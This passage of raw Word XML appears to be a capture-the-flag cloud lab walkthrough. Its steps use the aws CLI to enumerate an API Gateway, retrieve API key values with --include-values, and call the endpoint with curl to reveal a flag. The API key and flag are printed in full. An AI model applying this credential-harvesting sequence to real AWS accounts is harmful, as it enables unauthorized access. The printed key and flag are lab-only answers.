          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="224B2F8A" id="Ink 219" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:72.85pt;margin-top:46.1pt;width:101pt;height:18.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">
                <v:imagedata r:id="rId37"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page9image66356032" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="00837C51">
        <w:rPr>
          <w:rStyle w:val="SubtleReference"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725CD477" wp14:editId="76B9FE2A">
            <wp:extent cx="5731510" cy="3075940"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="156" name="Picture 156" descr="page9image6635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9image663560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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D408688" w14:textId="22B0BDF6" w:rsidR="009E55A4" w:rsidRDefault="009E55A4" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>The resource id is cad1t0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4507D1" w14:textId="7E82CE50" w:rsidR="009E55A4" w:rsidRDefault="0094232C" w:rsidP="009E55A4">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Step 10: ​Retrieve the method information for the above resource and the POST method: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95E709" w14:textId="2F75FBAE" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-method --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">-id 43iqo53xr7 --resource-id cad1t0 --http-method POST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBA08D" w14:textId="77777777" w:rsidR="00E83E2C" w:rsidRDefault="00E83E2C" w:rsidP="0094232C"/>
    <w:p w14:paraId="38C2EFFA" w14:textId="483FE8D8" w:rsidR="00533548" w:rsidRPr="0094232C" w:rsidRDefault="00DC252B" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3353CD76" wp14:editId="1CBB2407">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>275400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>449928</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1064880" cy="17280"/>
                <wp:effectExtent l="63500" t="101600" r="66040" b="109855"/>
                <wp:wrapNone/>
                <wp:docPr id="223" name="Ink 223"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId39">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1064880" cy="17280"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1DF027BB" id="Ink 223" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:18.85pt;margin-top:29.8pt;width:89.55pt;height:12.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">
                <v:imagedata r:id="rId40"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page9image66355200" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4FCD38" wp14:editId="468D8BEB">
            <wp:extent cx="5731510" cy="1294765"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13335"/>
            <wp:docPr id="155" name="Picture 155" descr="page9image6635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9image663552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294765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB256B5" w14:textId="5A00C627" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page10image66356656" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30840197" wp14:editId="3A6D1B49">
            <wp:extent cx="5731510" cy="2110740"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="152" name="Picture 152" descr="page10image6635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10image663566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110740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A3A6E" w14:textId="076D386D" w:rsidR="00DC252B" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The resource requires API Key and invokes the "my-serverless-flag" function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041A559D" w14:textId="77777777" w:rsidR="00DC252B" w:rsidRDefault="00DC252B" w:rsidP="0094232C"/>
    <w:p w14:paraId="0BAC346C" w14:textId="01531B5D" w:rsidR="00DC252B" w:rsidRDefault="00DC252B" w:rsidP="00DC252B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 11: ​List the stages of the rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> with id "43iqo53xr7".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B514AD" w14:textId="331CD401" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-stages --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>-id 43iqo53xr7</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E71028" w14:textId="2DCB2160" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00837C51" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64CC24F5" wp14:editId="249F04E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>928800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>893739</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1872360" cy="88200"/>
                <wp:effectExtent l="88900" t="139700" r="109220" b="140970"/>
                <wp:wrapNone/>
                <wp:docPr id="294" name="Ink 294"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId43">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1872360" cy="88200"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0CED981C" id="Ink 294" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:68.9pt;margin-top:61.85pt;width:155.95pt;height:23.9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">
                <v:imagedata r:id="rId44"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page10image66358736" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533DC410" wp14:editId="749509F2">
            <wp:extent cx="5731510" cy="2679065"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13335"/>
            <wp:docPr id="151" name="Picture 151" descr="page10image6635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10image663587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79065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63AA2C" w14:textId="5E69287E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="211817E4" w14:textId="548AB0CA" w:rsidR="00DC252B" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There is one stage named "default" for the rest API. Based on the stages, resource and the region, the invocation URL can be formulated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E3014" w14:textId="77777777" w:rsidR="00837C51" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Stage: ​default </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCCFD7" w14:textId="038B627E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Resource: ​v1</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Region:​ ap-southeast-1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E4267" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Invocation URL: ​https://43iqo53xr7.execute-api.ap-southeast-1.amazonaws.com/default/v1 Method:​ POST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD6217" w14:textId="77777777" w:rsidR="00DC252B" w:rsidRDefault="00DC252B" w:rsidP="0094232C"/>
    <w:p w14:paraId="37F39F7F" w14:textId="77777777" w:rsidR="00DC252B" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 12: ​API Key is required to invoke the API. List the available API Keys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D33E7" w14:textId="29EB038A" w:rsidR="00DC252B" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC252B">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC252B">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC252B">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">-keys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D83D37" w14:textId="77777777" w:rsidR="0033705D" w:rsidRDefault="0033705D" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page11image66361856" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C00811" wp14:editId="1C022781">
            <wp:extent cx="4531995" cy="2385695"/>
            <wp:effectExtent l="12700" t="12700" r="14605" b="14605"/>
            <wp:docPr id="148" name="Picture 148" descr="page11image6636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11image663618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1995" cy="2385695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C61D8" w14:textId="77777777" w:rsidR="00833044" w:rsidRDefault="00833044" w:rsidP="00833044">
      <w:r w:rsidRPr="0094232C">
        <w:t>The API Key's value is not listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B508E" w14:textId="19B2439A" w:rsidR="00DC252B" w:rsidRDefault="0094232C" w:rsidP="0033705D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Step 13: ​Use the "--include-values" flag to retrieve the API key value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3489A" w14:textId="7F0B59A7" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC252B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">-keys --include-values </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4FD6E" w14:textId="373D055A" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="54AB5BB9" w14:textId="03435DB1" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page12image66370176" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5B1028" wp14:editId="50A7E0E0">
            <wp:extent cx="5731510" cy="2834640"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="145" name="Picture 145" descr="page12image6637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12image6637017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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="179034C8" w14:textId="77777777" w:rsidR="0033705D" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The API key is cuHFZ7Ue4wDGFBocqurl9bzGsAszJds4Ajaox1pe </w:t>
      </w:r>
      <w:r w:rsidR="0033705D">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA9E39" w14:textId="4C2737B0" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0033705D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 14: ​Invoke the API with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">-key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552934AC" w14:textId="77777777" w:rsidR="0033705D" w:rsidRDefault="0094232C" w:rsidP="0033705D">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4DEA0" w14:textId="28D69555" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0033705D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>curl -X POST</w:t>
      </w:r>
      <w:r w:rsidR="0033705D" w:rsidRPr="0033705D">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-H 'x-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-key:</w:t>
      </w:r>
      <w:r w:rsidR="0033705D" w:rsidRPr="0033705D">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cuHFZ7Ue4wDGFBocqurl9bzGsAszJds4Ajaox1pe'</w:t>
      </w:r>
      <w:r w:rsidR="0033705D" w:rsidRPr="0033705D">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">https://43iqo53xr7.execute-api.ap-southeast-1.amazonaws.com/default/v1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DE670" w14:textId="13ABA8A9" w:rsidR="0033705D" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>The second flag is revealed.</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">ServerlessFLAG2: ​ce47062de2f1f20e00206008772a1241 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BCB7F" w14:textId="18ADE078" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0033705D" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61890986" wp14:editId="170B9917">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>47160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>359295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1481400" cy="24480"/>
                <wp:effectExtent l="63500" t="101600" r="68580" b="102870"/>
                <wp:wrapNone/>
                <wp:docPr id="228" name="Ink 228"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId48">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1481400" cy="24480"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6AB43739" id="Ink 228" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:.85pt;margin-top:22.65pt;width:122.35pt;height:13.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">
                <v:imagedata r:id="rId49"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page12image66358944" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
